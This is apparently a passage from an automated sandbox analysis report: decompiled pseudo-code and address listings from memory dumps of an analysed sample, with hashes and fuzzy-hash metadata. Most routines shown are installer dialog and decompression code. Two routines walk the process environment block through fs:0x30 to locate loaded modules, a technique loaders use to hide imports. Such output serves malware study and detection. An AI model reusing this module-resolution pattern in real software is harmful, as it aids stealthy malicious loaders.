                                                          								_v12 = _t288;
                                                          								_t251 = _v16;
                                                          								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                          									L60:
                                                          									if(_v48 != 0) {
                                                          										_t282 = _v48;
                                                          										_t283 = _t282 - 1;
                                                          										_t200 = _a28 + _t186;
                                                          										_v48 = _t283;
                                                          										_v24 = _t200;
                                                          										if(_v8 <= _t200) {
                                                          											goto L45;
                                                          										}
                                                          										goto L31;
                                                          									}
                                                          									break;
                                                          								} else {
                                                          									goto L58;
                                                          								}
                                                          								do {
                                                          									L58:
                                                          									_t186 = _t186 - _a28;
                                                          									_t251 = _t251 - 1;
                                                          								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                          								_v16 = _t251;
                                                          								goto L60;
                                                          							}
                                                          							L61:
                                                          							_v8 = _v8 + 1;
                                                          							_v32 = _v32 + 4;
                                                          							_v44 = _v44 + 1;
                                                          						} while (_v8 <= _v28);
                                                          						goto L62;
                                                          					}
                                                          					_t277 = 0;
                                                          					do {
                                                          						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                          						_t277 = _t277 + 4;
                                                          						_t235 = _t235 - 1;
                                                          						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                          					} while (_t235 != 0);
                                                          					goto L21;
                                                          				}
                                                          				 *_a24 =  *_a24 & 0x00000000;
                                                          				 *_a28 =  *_a28 & 0x00000000;
                                                          				return 0;
                                                          			}











































































                                                          0x0040727d
                                                          0x00407285
                                                          0x00407289
                                                          0x0040728b
                                                          0x0040728e
                                                          0x00407290
                                                          0x00407290
                                                          0x00407292
                                                          0x00407299
                                                          0x0040729b
                                                          0x0040729b
                                                          0x004072a1
                                                          0x004072b6
                                                          0x004072be
                                                          0x004072c0
                                                          0x004072c2
                                                          0x004072c5
                                                          0x004072c6
                                                          0x004072c6
                                                          0x004072cc
                                                          0x00000000
                                                          0x00000000
                                                          0x004072ce
                                                          0x004072d1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004072d1
                                                          0x004072d5
                                                          0x004072d8
                                                          0x004072da
                                                          0x004072da
                                                          0x004072dd
                                                          0x004072e3
                                                          0x004072e4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004072e4
                                                          0x004072e9
                                                          0x004072ec
                                                          0x004072ee
                                                          0x004072ee
                                                          0x004072f4
                                                          0x004072f6
                                                          0x00407307
                                                          0x004072fa
                                                          0x004072fe
                                                          0x004075a3
                                                          0x00000000
                                                          0x004075a3
                                                          0x00407304
                                                          0x00407305
                                                          0x00407305
                                                          0x0040730d
                                                          0x00407310
                                                          0x00407314
                                                          0x00407316
                                                          0x00407318
                                                          0x0040731b
                                                          0x00000000
                                                          0x00000000
                                                          0x00407323
                                                          0x00407329
                                                          0x0040732b
                                                          0x0040732d
                                                          0x0040732e
                                                          0x00407343
                                                          0x00407343
                                                          0x00407346
                                                          0x00407348
                                                          0x00407348
                                                          0x0040734a
                                                          0x0040734f
                                                          0x00407351
                                                          0x00407358
                                                          0x0040735a
                                                          0x00407362
                                                          0x00407362
                                                          0x00407364
                                                          0x00407365
                                                          0x00407374
                                                          0x00407378
                                                          0x0040737c
                                                          0x0040737f
                                                          0x00407382
                                                          0x00407387
                                                          0x0040738a
                                                          0x00407390
                                                          0x00407397
                                                          0x0040739d
                                                          0x00407596
                                                          0x00407596
                                                          0x0040759b
                                                          0x004075aa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040759b
                                                          0x004073aa
                                                          0x004073ad
                                                          0x004073b0
                                                          0x004073b3
                                                          0x004073b7
                                                          0x00000000
                                                          0x00000000
                                                          0x004073c2
                                                          0x004073c5
                                                          0x004073c6
                                                          0x004073c8
                                                          0x004073ce
                                                          0x004073d1
                                                          0x00000000
                                                          0x00000000
                                                          0x004073d7
                                                          0x004073d8
                                                          0x004073db
                                                          0x004073de
                                                          0x004073e1
                                                          0x004073e7
                                                          0x004073e9
                                                          0x004073e9
                                                          0x004073f1
                                                          0x004073f5
                                                          0x004073fa
                                                          0x0040741f
                                                          0x00407425
                                                          0x00407427
                                                          0x00407429
                                                          0x0040742c
                                                          0x00407435
                                                          0x00000000
                                                          0x00000000
                                                          0x004073fc
                                                          0x004073fc
                                                          0x00407405
                                                          0x00407409
                                                          0x00000000
                                                          0x00000000
                                                          0x0040741a
                                                          0x0040741a
                                                          0x0040741d
                                                          0x00000000
                                                          0x00000000
                                                          0x0040740d
                                                          0x00407410
                                                          0x00407412
                                                          0x00407416
                                                          0x00000000
                                                          0x00000000
                                                          0x00407418
                                                          0x00407418
                                                          0x00000000
                                                          0x0040741a
                                                          0x0040743e
                                                          0x00407444
                                                          0x0040744e
                                                          0x00407450
                                                          0x00407455
                                                          0x00407457
                                                          0x0040748d
                                                          0x00407459
                                                          0x00407459
                                                          0x0040745c
                                                          0x0040745f
                                                          0x00407469
                                                          0x0040746c
                                                          0x00407473
                                                          0x0040747e
                                                          0x00407485
                                                          0x00407485
                                                          0x0040748f
                                                          0x00407492
                                                          0x00407494
                                                          0x0040749a
                                                          0x0040749a
                                                          0x004074a3
                                                          0x004074a6
                                                          0x004074ab
                                                          0x004074ba
                                                          0x004074c2
                                                          0x004074c7
                                                          0x004074eb
                                                          0x004074f3
                                                          0x004074f7
                                                          0x004074fd
                                                          0x004074c9
                                                          0x004074d7
                                                          0x004074da
                                                          0x004074e0
                                                          0x004074e0
                                                          0x00407501
                                                          0x004074bc
                                                          0x004074bc
                                                          0x004074bc
                                                          0x00407512
                                                          0x00407516
                                                          0x00407522
                                                          0x0040751d
                                                          0x00407520
                                                          0x00407520
                                                          0x0040752a
                                                          0x0040752f
                                                          0x00407537
                                                          0x00407533
                                                          0x00407535
                                                          0x00407535
                                                          0x0040753d
                                                          0x0040753f
                                                          0x00407546
                                                          0x00407550
                                                          0x0040755a
                                                          0x00407576
                                                          0x0040757a
                                                          0x004073bf
                                                          0x004073c5
                                                          0x004073c6
                                                          0x004073c8
                                                          0x004073ce
                                                          0x004073d1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004073d1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040755c
                                                          0x0040755c
                                                          0x0040755c
                                                          0x00407561
                                                          0x0040756a
                                                          0x00407573
                                                          0x00000000
                                                          0x00407573
                                                          0x00407580
                                                          0x00407580
                                                          0x00407583
                                                          0x0040758a
                                                          0x0040758d
                                                          0x00000000
                                                          0x004073b0
                                                          0x00407330
                                                          0x00407332
                                                          0x00407332
                                                          0x00407336
                                                          0x00407339
                                                          0x0040733a
                                                          0x0040733a
                                                          0x00000000
                                                          0x00407332
                                                          0x004072a6
                                                          0x004072ac
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
                                                          • Instruction ID: 0a9d7053db9648894e52107a0598598bb6c65082166a45c8961a79b8daba83ed
                                                          • Opcode Fuzzy Hash: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
                                                          • Instruction Fuzzy Hash: 7AC13831E042199BCF18CF68D8905EEBBB2BF99314F25826AD85677380D734A942CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E7378478F(void* __eflags, intOrPtr* _a4) {
                                                          				intOrPtr* _v8;
                                                          				intOrPtr _v12;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _v20;
                                                          				signed int _t35;
                                                          
                                                          				_v16 =  *[fs:0x30];
                                                          				_v12 =  *((intOrPtr*)(_v16 + 0xc));
                                                          				_v20 =  *((intOrPtr*)(_v12 + 0xc));
                                                          				_v8 =  *((intOrPtr*)(_v12 + 0xc));
                                                          				while(E737846D3(_t35,  *((intOrPtr*)(_v8 + 0x30)), _a4) != 0) {
                                                          					_v8 =  *_v8;
                                                          					if(_v8 != _v20) {
                                                          						continue;
                                                          					}
                                                          					return 0;
                                                          				}
                                                          				return  *((intOrPtr*)(_v8 + 0x28));
                                                          			}








                                                          0x7378479b
                                                          0x737847a4
                                                          0x737847ad
                                                          0x737847b6
                                                          0x737847b9
                                                          0x737847d8
                                                          0x737847e1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x737847e3
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.211111185.0000000073783000.00000040.00020000.sdmp, Offset: 73780000, based on PE: true
                                                          • Associated: 00000001.00000002.211060795.0000000073780000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211078275.0000000073781000.00000080.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211091894.0000000073782000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211127067.0000000073785000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                          • Instruction ID: 8fe3c9065f226512eacc56ccb1decc97fbc4918e38973246a69b1a5182b59d55
                                                          • Opcode Fuzzy Hash: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                          • Instruction Fuzzy Hash: EC014D78A10218EFDB41DF98C585A9DFBF5FB08320F148596E814E7711E370AE50DB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E7378458C() {
                                                          
                                                          				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
                                                          			}



                                                          0x737845a3

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.211111185.0000000073783000.00000040.00020000.sdmp, Offset: 73780000, based on PE: true
                                                          • Associated: 00000001.00000002.211060795.0000000073780000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211078275.0000000073781000.00000080.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211091894.0000000073782000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211127067.0000000073785000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                          • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                          • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                          • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 96%
                                                          			E00404CD6(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                          				struct HWND__* _v8;
                                                          				struct HWND__* _v12;
                                                          				long _v16;
                                                          				signed int _v20;
                                                          				signed int _v24;
                                                          				intOrPtr _v28;
                                                          				signed char* _v32;
                                                          				int _v36;
                                                          				signed int _v44;
                                                          				int _v48;
                                                          				signed int* _v60;
                                                          				signed char* _v64;
                                                          				signed int _v68;
                                                          				long _v72;
                                                          				void* _v76;
                                                          				intOrPtr _v80;
                                                          				intOrPtr _v84;
                                                          				void* _v88;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t203;
                                                          				intOrPtr _t206;
                                                          				intOrPtr _t207;
                                                          				long _t212;
                                                          				signed int _t216;
                                                          				signed int _t227;
                                                          				void* _t230;
                                                          				void* _t231;
                                                          				int _t237;
                                                          				long _t242;
                                                          				long _t243;
                                                          				signed int _t244;
                                                          				signed int _t250;
                                                          				signed int _t252;
                                                          				signed char _t253;
                                                          				signed char _t259;
                                                          				void* _t264;
                                                          				void* _t266;
                                                          				signed char* _t284;
                                                          				signed char _t285;
                                                          				long _t290;
                                                          				signed int _t300;
                                                          				signed int _t308;
                                                          				signed char* _t316;
                                                          				int _t320;
                                                          				int _t321;
                                                          				signed int* _t322;
                                                          				int _t323;
                                                          				long _t324;
                                                          				signed int _t325;
                                                          				long _t327;
                                                          				int _t328;
                                                          				signed int _t329;
                                                          				void* _t331;
                                                          
                                                          				_v12 = GetDlgItem(_a4, 0x3f9);
                                                          				_v8 = GetDlgItem(_a4, 0x408);
                                                          				_t331 = SendMessageA;
                                                          				_v24 =  *0x42f488;
                                                          				_v28 =  *0x42f454 + 0x94;
                                                          				_t320 = 0x10;
                                                          				if(_a8 != 0x110) {
                                                          					L23:
                                                          					if(_a8 != 0x405) {
                                                          						_t298 = _a16;
                                                          					} else {
                                                          						_a12 = 0;
                                                          						_t298 = 1;
                                                          						_a8 = 0x40f;
                                                          						_a16 = 1;
                                                          					}
                                                          					if(_a8 == 0x4e || _a8 == 0x413) {
                                                          						_v16 = _t298;
                                                          						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
                                                          							if(( *0x42f45d & 0x00000002) != 0) {
                                                          								L41:
                                                          								if(_v16 != 0) {
                                                          									_t242 = _v16;
                                                          									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
                                                          										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
                                                          									}
                                                          									_t243 = _v16;
                                                          									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
                                                          										_t298 = _v24;
                                                          										_t244 =  *(_t243 + 0x5c);
                                                          										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
                                                          											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
                                                          										} else {
                                                          											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
                                                          										}
                                                          									}
                                                          								}
                                                          								goto L48;
                                                          							}
                                                          							if(_a8 == 0x413) {
                                                          								L33:
                                                          								_t298 = 0 | _a8 != 0x00000413;
                                                          								_t250 = E00404C24(_v8, _a8 != 0x413);
                                                          								_t325 = _t250;
                                                          								if(_t325 >= 0) {
                                                          									_t99 = _v24 + 8; // 0x8
                                                          									_t298 = _t250 * 0x418 + _t99;
                                                          									_t252 =  *_t298;
                                                          									if((_t252 & 0x00000010) == 0) {
                                                          										if((_t252 & 0x00000040) == 0) {
                                                          											_t253 = _t252 ^ 0x00000001;
                                                          										} else {
                                                          											_t259 = _t252 ^ 0x00000080;
                                                          											if(_t259 >= 0) {
                                                          												_t253 = _t259 & 0x000000fe;
                                                          											} else {
                                                          												_t253 = _t259 | 0x00000001;
                                                          											}
                                                          										}
                                                          										 *_t298 = _t253;
                                                          										E0040117D(_t325);
                                                          										_a12 = _t325 + 1;
                                                          										_a16 =  !( *0x42f45c) >> 0x00000008 & 0x00000001;
                                                          										_a8 = 0x40f;
                                                          									}
                                                          								}
                                                          								goto L41;
                                                          							}
                                                          							_t298 = _a16;
                                                          							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                          								goto L41;
                                                          							}
                                                          							goto L33;
                                                          						} else {
                                                          							goto L48;
                                                          						}
                                                          					} else {
                                                          						L48:
                                                          						if(_a8 != 0x111) {
                                                          							L56:
                                                          							if(_a8 == 0x200) {
                                                          								SendMessageA(_v8, 0x200, 0, 0);
                                                          							}
                                                          							if(_a8 == 0x40b) {
                                                          								_t230 =  *0x42a89c;
                                                          								if(_t230 != 0) {
                                                          									ImageList_Destroy(_t230);
                                                          								}
                                                          								_t231 =  *0x42a8b0;
                                                          								if(_t231 != 0) {
                                                          									GlobalFree(_t231);
                                                          								}
                                                          								 *0x42a89c = 0;
                                                          								 *0x42a8b0 = 0;
                                                          								 *0x42f4c0 = 0;
                                                          							}
                                                          							if(_a8 != 0x40f) {
                                                          								L90:
                                                          								if(_a8 == 0x420 && ( *0x42f45d & 0x00000001) != 0) {
                                                          									_t321 = (0 | _a16 == 0x00000020) << 3;
                                                          									ShowWindow(_v8, _t321);
                                                          									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
                                                          								}
                                                          								goto L93;
                                                          							} else {
                                                          								E004011EF(_t298, 0, 0);
                                                          								_t203 = _a12;
                                                          								if(_t203 != 0) {
                                                          									if(_t203 != 0xffffffff) {
                                                          										_t203 = _t203 - 1;
                                                          									}
                                                          									_push(_t203);
                                                          									_push(8);
                                                          									E00404CA4();
                                                          								}
                                                          								if(_a16 == 0) {
                                                          									L75:
                                                          									E004011EF(_t298, 0, 0);
                                                          									_v36 =  *0x42a8b0;
                                                          									_t206 =  *0x42f488;
                                                          									_v64 = 0xf030;
                                                          									_v24 = 0;
                                                          									if( *0x42f48c <= 0) {
                                                          										L86:
                                                          										if( *0x42f44c == 4) {
                                                          											InvalidateRect(_v8, 0, 1);
                                                          										}
                                                          										_t207 =  *0x42ec1c; // 0x53f080
                                                          										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
                                                          											E00404BDF(0x3ff, 0xfffffffb, E00404BF7(5));
                                                          										}
                                                          										goto L90;
                                                          									}
                                                          									_t322 = _t206 + 8;
                                                          									do {
                                                          										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                          										if(_t212 != 0) {
                                                          											_t300 =  *_t322;
                                                          											_v72 = _t212;
                                                          											_v76 = 8;
                                                          											if((_t300 & 0x00000001) != 0) {
                                                          												_v76 = 9;
                                                          												_v60 =  &(_t322[4]);
                                                          												_t322[0] = _t322[0] & 0x000000fe;
                                                          											}
                                                          											if((_t300 & 0x00000040) == 0) {
                                                          												_t216 = (_t300 & 0x00000001) + 1;
                                                          												if((_t300 & 0x00000010) != 0) {
                                                          													_t216 = _t216 + 3;
                                                          												}
                                                          											} else {
                                                          												_t216 = 3;
                                                          											}
                                                          											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
                                                          											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                          											SendMessageA(_v8, 0x110d, 0,  &_v76);
                                                          										}
                                                          										_v24 = _v24 + 1;
                                                          										_t322 =  &(_t322[0x106]);
                                                          									} while (_v24 <  *0x42f48c);
                                                          									goto L86;
                                                          								} else {
                                                          									_t323 = E004012E2( *0x42a8b0);
                                                          									E00401299(_t323);
                                                          									_t227 = 0;
                                                          									_t298 = 0;
                                                          									if(_t323 <= 0) {
                                                          										L74:
                                                          										SendMessageA(_v12, 0x14e, _t298, 0);
                                                          										_a16 = _t323;
                                                          										_a8 = 0x420;
                                                          										goto L75;
                                                          									} else {
                                                          										goto L71;
                                                          									}
                                                          									do {
                                                          										L71:
                                                          										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
                                                          											_t298 = _t298 + 1;
                                                          										}
                                                          										_t227 = _t227 + 1;
                                                          									} while (_t227 < _t323);
                                                          									goto L74;
                                                          								}
                                                          							}
                                                          						}
                                                          						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                          							goto L93;
                                                          						} else {
                                                          							_t237 = SendMessageA(_v12, 0x147, 0, 0);
                                                          							if(_t237 == 0xffffffff) {
                                                          								goto L93;
                                                          							}
                                                          							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
                                                          							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
                                                          								_t324 = 0x20;
                                                          							}
                                                          							E00401299(_t324);
                                                          							SendMessageA(_a4, 0x420, 0, _t324);
                                                          							_a12 = _a12 | 0xffffffff;
                                                          							_a16 = 0;
                                                          							_a8 = 0x40f;
                                                          							goto L56;
                                                          						}
                                                          					}
                                                          				} else {
                                                          					_v36 = 0;
                                                          					 *0x42f4c0 = _a4;
                                                          					_v20 = 2;
                                                          					 *0x42a8b0 = GlobalAlloc(0x40,  *0x42f48c << 2);
                                                          					_t264 = LoadImageA( *0x42f440, 0x6e, 0, 0, 0, 0);
                                                          					 *0x42a8a4 =  *0x42a8a4 | 0xffffffff;
                                                          					_v16 = _t264;
                                                          					 *0x42a8ac = SetWindowLongA(_v8, 0xfffffffc, E004052E8);
                                                          					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
                                                          					 *0x42a89c = _t266;
                                                          					ImageList_AddMasked(_t266, _v16, 0xff00ff);
                                                          					SendMessageA(_v8, 0x1109, 2,  *0x42a89c);
                                                          					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
                                                          						SendMessageA(_v8, 0x111b, _t320, 0);
                                                          					}
                                                          					DeleteObject(_v16);
                                                          					_t327 = 0;
                                                          					do {
                                                          						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
                                                          						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
                                                          							if(_t327 != 0x20) {
                                                          								_v20 = 0;
                                                          							}
                                                          							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062E0(0, _t327, _t331, 0, _t272)), _t327);
                                                          						}
                                                          						_t327 = _t327 + 1;
                                                          					} while (_t327 < 0x21);
                                                          					_t328 = _a16;
                                                          					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
                                                          					_push(0x15);
                                                          					E004042D1(_a4);
                                                          					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
                                                          					_push(0x16);
                                                          					E004042D1(_a4);
                                                          					_t329 = 0;
                                                          					_v16 = 0;
                                                          					if( *0x42f48c <= 0) {
                                                          						L19:
                                                          						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                          						goto L20;
                                                          					} else {
                                                          						_t316 = _v24 + 8;
                                                          						_v32 = _t316;
                                                          						do {
                                                          							_t284 =  &(_t316[0x10]);
                                                          							if( *_t284 != 0) {
                                                          								_v64 = _t284;
                                                          								_t285 =  *_t316;
                                                          								_v88 = _v16;
                                                          								_t308 = 0x20;
                                                          								_v84 = 0xffff0002;
                                                          								_v80 = 0xd;
                                                          								_v68 = _t308;
                                                          								_v44 = _t329;
                                                          								_v72 = _t285 & _t308;
                                                          								if((_t285 & 0x00000002) == 0) {
                                                          									if((_t285 & 0x00000004) == 0) {
                                                          										 *( *0x42a8b0 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                          									} else {
                                                          										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
                                                          									}
                                                          								} else {
                                                          									_v80 = 0x4d;
                                                          									_v48 = 1;
                                                          									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                          									_v36 = 1;
                                                          									 *( *0x42a8b0 + _t329 * 4) = _t290;
                                                          									_v16 =  *( *0x42a8b0 + _t329 * 4);
                                                          								}
                                                          							}
                                                          							_t329 = _t329 + 1;
                                                          							_t316 =  &(_v32[0x418]);
                                                          							_v32 = _t316;
                                                          						} while (_t329 <  *0x42f48c);
                                                          						if(_v36 != 0) {
                                                          							L20:
                                                          							if(_v20 != 0) {
                                                          								E00404306(_v8);
                                                          								goto L23;
                                                          							} else {
                                                          								ShowWindow(_v12, 5);
                                                          								E00404306(_v12);
                                                          								L93:
                                                          								return E00404338(_a8, _a12, _a16);
                                                          							}
                                                          						}
                                                          						goto L19;
                                                          					}
                                                          				}
                                                          			}


























































                                                          0x00404cf4
                                                          0x00404cfc
                                                          0x00404d04
                                                          0x00404d0a
                                                          0x00404d22
                                                          0x00404d25
                                                          0x00404d26
                                                          0x00404f53
                                                          0x00404f5a
                                                          0x00404f6e
                                                          0x00404f5c
                                                          0x00404f5e
                                                          0x00404f61
                                                          0x00404f62
                                                          0x00404f69
                                                          0x00404f69
                                                          0x00404f7a
                                                          0x00404f88
                                                          0x00404f8b
                                                          0x00404fa1
                                                          0x00405016
                                                          0x00405019
                                                          0x0040501b
                                                          0x00405025
                                                          0x00405033
                                                          0x00405033
                                                          0x00405035
                                                          0x0040503f
                                                          0x00405045
                                                          0x00405048
                                                          0x0040504b
                                                          0x00405066
                                                          0x0040504d
                                                          0x00405057
                                                          0x00405057
                                                          0x0040504b
                                                          0x0040503f
                                                          0x00000000
                                                          0x00405019
                                                          0x00404fa6
                                                          0x00404fb1
                                                          0x00404fb6
                                                          0x00404fbd
                                                          0x00404fc2
                                                          0x00404fc6
                                                          0x00404fd1
                                                          0x00404fd1
                                                          0x00404fd5
                                                          0x00404fd9
                                                          0x00404fdd
                                                          0x00404ff0
                                                          0x00404fdf
                                                          0x00404fdf
                                                          0x00404fe6
                                                          0x00404fec
                                                          0x00404fe8
                                                          0x00404fe8
                                                          0x00404fe8
                                                          0x00404fe6
                                                          0x00404ff4
                                                          0x00404ff6
                                                          0x00405009
                                                          0x0040500c
                                                          0x0040500f
                                                          0x0040500f
                                                          0x00404fd9
                                                          0x00000000
                                                          0x00404fc6
                                                          0x00404fa8
                                                          0x00404faf
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405069
                                                          0x00405069
                                                          0x00405070
                                                          0x004050e1
                                                          0x004050e9
                                                          0x004050f1
                                                          0x004050f1
                                                          0x004050fa
                                                          0x004050fc
                                                          0x00405103
                                                          0x00405106
                                                          0x00405106
                                                          0x0040510c
                                                          0x00405113
                                                          0x00405116
                                                          0x00405116
                                                          0x0040511c
                                                          0x00405122
                                                          0x00405128
                                                          0x00405128
                                                          0x00405135
                                                          0x00405295
                                                          0x0040529c
                                                          0x004052b9
                                                          0x004052bf
                                                          0x004052d1
                                                          0x004052d1
                                                          0x00000000
                                                          0x0040513b
                                                          0x0040513d
                                                          0x00405142
                                                          0x00405147
                                                          0x0040514c
                                                          0x0040514e
                                                          0x0040514e
                                                          0x0040514f
                                                          0x00405150
                                                          0x00405152
                                                          0x00405152
                                                          0x0040515a
                                                          0x0040519b
                                                          0x0040519d
                                                          0x004051ad
                                                          0x004051b0
                                                          0x004051b5
                                                          0x004051bc
                                                          0x004051bf
                                                          0x00405261
                                                          0x00405269
                                                          0x00405271
                                                          0x00405271
                                                          0x00405277
                                                          0x0040527f
                                                          0x00405290
                                                          0x00405290
                                                          0x00000000
                                                          0x0040527f
                                                          0x004051c5
                                                          0x004051c8
                                                          0x004051ce
                                                          0x004051d3
                                                          0x004051d5
                                                          0x004051d7
                                                          0x004051dd
                                                          0x004051e4
                                                          0x004051e9
                                                          0x004051f0
                                                          0x004051f3
                                                          0x004051f3
                                                          0x004051fa
                                                          0x00405206
                                                          0x0040520a
                                                          0x0040520c
                                                          0x0040520c
                                                          0x004051fc
                                                          0x004051fe
                                                          0x004051fe
                                                          0x0040522c
                                                          0x00405238
                                                          0x00405247
                                                          0x00405247
                                                          0x00405249
                                                          0x0040524c
                                                          0x00405255
                                                          0x00000000
                                                          0x0040515c
                                                          0x00405167
                                                          0x0040516a
                                                          0x0040516f
                                                          0x00405171
                                                          0x00405175
                                                          0x00405185
                                                          0x0040518f
                                                          0x00405191
                                                          0x00405194
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405177
                                                          0x00405177
                                                          0x0040517d
                                                          0x0040517f
                                                          0x0040517f
                                                          0x00405180
                                                          0x00405181
                                                          0x00000000
                                                          0x00405177
                                                          0x0040515a
                                                          0x00405135
                                                          0x00405078
                                                          0x00000000
                                                          0x0040508e
                                                          0x00405098
                                                          0x0040509d
                                                          0x00000000
                                                          0x00000000
                                                          0x004050af
                                                          0x004050b4
                                                          0x004050c0
                                                          0x004050c0
                                                          0x004050c2
                                                          0x004050d1
                                                          0x004050d3
                                                          0x004050d7
                                                          0x004050da
                                                          0x00000000
                                                          0x004050da
                                                          0x00405078
                                                          0x00404d2c
                                                          0x00404d2f
                                                          0x00404d32
                                                          0x00404d42
                                                          0x00404d55
                                                          0x00404d60
                                                          0x00404d66
                                                          0x00404d74
                                                          0x00404d87
                                                          0x00404d8c
                                                          0x00404d97
                                                          0x00404da0
                                                          0x00404db6
                                                          0x00404dc6
                                                          0x00404dd2
                                                          0x00404dd2
                                                          0x00404dd7
                                                          0x00404ddd
                                                          0x00404ddf
                                                          0x00404de2
                                                          0x00404de7
                                                          0x00404dec
                                                          0x00404dee
                                                          0x00404dee
                                                          0x00404e0e
                                                          0x00404e0e
                                                          0x00404e10
                                                          0x00404e11
                                                          0x00404e16
                                                          0x00404e1c
                                                          0x00404e20
                                                          0x00404e25
                                                          0x00404e2d
                                                          0x00404e31
                                                          0x00404e36
                                                          0x00404e3b
                                                          0x00404e43
                                                          0x00404e46
                                                          0x00404f15
                                                          0x00404f28
                                                          0x00000000
                                                          0x00404e4c
